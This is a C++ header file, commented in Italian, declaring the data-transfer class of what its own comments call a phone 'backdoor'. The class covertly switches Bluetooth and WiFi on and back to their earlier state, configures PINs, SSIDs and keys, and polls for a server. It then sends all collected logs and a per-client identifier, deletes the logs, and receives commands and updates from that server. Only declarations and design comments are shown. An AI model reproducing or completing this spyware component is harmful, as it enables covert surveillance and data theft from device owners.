#include "Common.h"
#include <string>
#include <exception>
using namespace std;

#ifndef __Transfer_h__
#define __Transfer_h__

#include "Status.h"

class Status;
class Transfer;

class Transfer
{
	/**
	 * TRUE se il BT e' attualmente attivo, FALSE altrimenti.
	 */
	private: BOOL bIsBtActive;
	/**
	 * TRUE se il WiFi e' attualmente attivo, FALSE altrimenti.
	 */
	private: BOOL bIsWifiActive;
	/**
	 * TRUE se il BT e' gia' stato attivato da noi, FALSE altrimenti.
	 */
	private: BOOL bIsBtAlreadyActive;
	/**
	 * TRUE se il WiFi e' gia' stato attivato da noi, FALSE altrimenti.
	 */
	private: BOOL bIsWifiAlreadyActive;
	/**
	 * Struttura che definisce le informazioni sulla backdoor:
	 * 1. Dimensione della struttura in byte
	 * 2. Versione (anno/mese/giorno, 16 byte, 8 Wide chars)
	 * 3. Identificativo univoco per cliente (16 byte)
	 * 4. ID Univoco del client
	 * 5. Orario in epoch time
	 */
	private: struct backDoorInfo;
	private: SOCKET wifiSocket;
	private: SOCKET BTSocket;
	private: SOCKET internetSocket;
	/**
	 * Serve al costruttore per impostare tutte le opzioni che sono presenti nel file di configurazione
	 * e che sono differenti da quelle presenti nelle variabili globali.
	 */
	private: Status statusObj;
	/**
	 * Tempo in secondi per il loop di polling della connessione.
	 */
	private: UINT pollInterval;

	/**
	 * Attiva il dispositivo BT, torna TRUE se l'attivazione e' andata a buon fine, FALSE altrimenti. Questa funzione
	 * deve controllare prima lo stato di bIsBtAlreadyActive per evitare la doppia attivazione e per mantenere
	 * lo stato dell'oggetto coerente con lo stato del telefono.
	 */
	private: BOOL ActivateBT();

	/**
	 * Disattiva il dispositivo BT, torna TRUE se la disattivazione e' andata a buon fine, FALSE altrimenti. Questa
	 * funzione deve controllare lo stato del BT per vedere se e' ancora attivo (l'utente potrebbe averlo 
	 * disattivato), poi deve controllare lo stato di bIsBtAlreadyActive per verificare che il BT non fosse gia' acceso
	 * per conto suo. In caso contrario lo spegne altrimenti lo lascia allo stato originale.
	 */
	private: BOOL DeActivateBT();

	/**
	 * Attiva la connessione WiFi, torna TRUE se l'attivazione e' andata a buon fine, FALSE altrimenti. Questa 
	 * funzione deve controllare prima lo stato di bIsWifiAlreadyActive per evitare la doppia attivazione e per 
	 * mantenere lo stato dell'oggetto coerente con lo stato del telefono.
	 */
	private: BOOL ActivateWiFi();

	/**
	 * Disattiva il dispositivo WiFi, torna TRUE se la disattivazione e' andata a buon fine, FALSE altrimenti. Questa
	 * funzione deve controllare lo stato del Wifi per vedere se e' ancora attivo (l'utente potrebbe averlo 
	 * disattivato), poi deve controllare lo stato di bIsWifiAlreadyActive per verificare che il Wifi non fosse gia' 
	 * acceso per conto suo. In caso contrario lo spegne altrimenti lo lascia allo stato originale.
	 */
	private: BOOL DeActivateWiFi();

	/**
	 * Imposta il PIN per la connessione BT. Torna TRUE se il PIN e' stato impostato correttamente, FALSE altrimenti.
	 */
	private: BOOL SetBTPin(BYTE* pPin);

	/**
	 * Torna TRUE se e' disponibile una connessione ad internet attiva, FALSE altrimenti.
	 */
	private: BOOL IsInternetConnectionAvailable();

	private: void MiniSleep(UINT delay);

	/**
	 * Invia tutti i log dalla cartella dei log alla connessione stabilita da Poll(), al termine dell'invio rimuove tutti i log.
	 * Se l'invio e' avvenuto con successo torna TRUE, altrimenti torna FALSE (indica che e' necessario rifare il send).
	 * Il sending funziona in questo modo: per prima cosa si invia la BackDoorInfo struct, si chiama la Recv() e ci
	 * si mette in attesa del comando di configurazione ricevuta. Quindi si invia un log e ci si mette in attesa del
	 * comando di log ricevuto (il comando conterra' il messaggio di OK ed il numero di byte ricevuti, in futuro
	 * dovrebbe contenere un CRC), se il log e' stato ricevuto con successo si rimuove, altrimenti si risenda. Al
	 * termine dell'invio dei log si invia un messaggio di "log terminati". A questo punto si chiama la Recv() e si
	 * resta in attesa di eventuali aggiornamenti, a procedura compiuta si chiude la connessione.
	 */
	private: BOOL Send();

	/**
	 * Riceve uno o piu' comandi dal server, ritorna un puntatore ad un buffer contenente i dati, questo buffer va
	 * poi liberato dal chiamante. La funzione prende in input un intero passato per riferimento che conterra' il
	 * numero di byte presente nel buffer. Se la funzione fallisce torna NULL. Questa funzione e' privata perche'
	 * viene chiamata all'interno della Send() al termine del ciclo di invio.
	 */
	private: BYTE* Recv(UINT* len);

	/**
	 * Chiude la connessione al tipo di socket specificato, la documentazione del tipo si trova nella documentazione
	 * dei parametri della funzione. Torna TRUE se la connessione e' stata chiusa con successo, FALSE altrimenti.
	 * Close, se necessario, disattiva il BT o il WiFi.
	 */
	private: BOOL Close(UINT type);

	/**
	 * Imposta nella configurazione il nuovo MAC Address che verra' utilizzato per la connessione BT. Torna TRUE se
	 * la nuova impostazione e' stata aggiornata correttamente, FALSE altrimenti.
	 */
	private: BOOL SetBTMacAddress(BYTE* pMacAddress);

	/**
	 * Imposta nella configurazione il nuovo MAC Address che verra' utilizzato per la connessione WiFi. Torna TRUE se
	 * la nuova impostazione e' stata aggiornata correttamente, FALSE altrimenti.
	 */
	private: BOOL SetWifiMacAddress(UINT pMacAddress);

	/**
	 * Imposta nella configurazione il nuovo SSID che verra' utilizzato per la connessione WiFi. Torna TRUE se
	 * la nuova impostazione e' stata aggiornata correttamente, FALSE altrimenti.
	 */
	private: BOOL SetWifiSSID(WCHAR* pSSID);

	/**
	 * Imposta la chiave per la connessione WiFi ed il tipo di connessione (in chiaro, WEP, WPA, WPA2...). Torna
	 * TRUE se la funzione e' andata a buon fine, FALSE altrimenti.
	 */
	private: BOOL SetWifiKey(BYTE* pKey, UINT len, UINT type);

	/**
	 * Costruttore di default, chiama la Status.GetConfStruct() per inizializzare tutte le impostazioni per il polling e
	 * per l'inizializzazione delle connessioni.
	 */
	public:  Transfer(UINT id);

	/**
	 * Effettua il polling per vedere se:
	 * 1. E' presente il server BT al quale inviare i dati.
	 * 2. E' presente l'AP WiFi al quale inviare i dati.
	 * 3. E' presente la connessione ad internet.
	 * La connessione viene effettuata direttamente da questa chiamata al primo tipo di connessione disponibile.
	 * La funzione torna 0 se non trova nessuna connessione disponibile. Gli altri valori di ritorno sono cosi'
	 * definiti:
	 * 
	 * #define BLUETOOTH_CONNECTED 1
	 * #define WIFI_CONNECTED 2
	 * #define INTERNET_CONNECTED 3
	 * 
	 * Se la funzione trova, ad esempio, il server bluetooth ma non riesce a collegarsi, invia il valore definito per
	 * quella connessione e negato. Sembra complicato ma non lo e', ad esempio nel caso venga trovato il server
	 * BT ma non si riesca ad effettuare la connessione il risultato sara':
	 * 
	 * return -(BLUETOOTH_CONNECTED);
	 * 
	 * Poll apre la connessione al socket.
	 */
	public: INT Poll(UINT type);
};

#endif
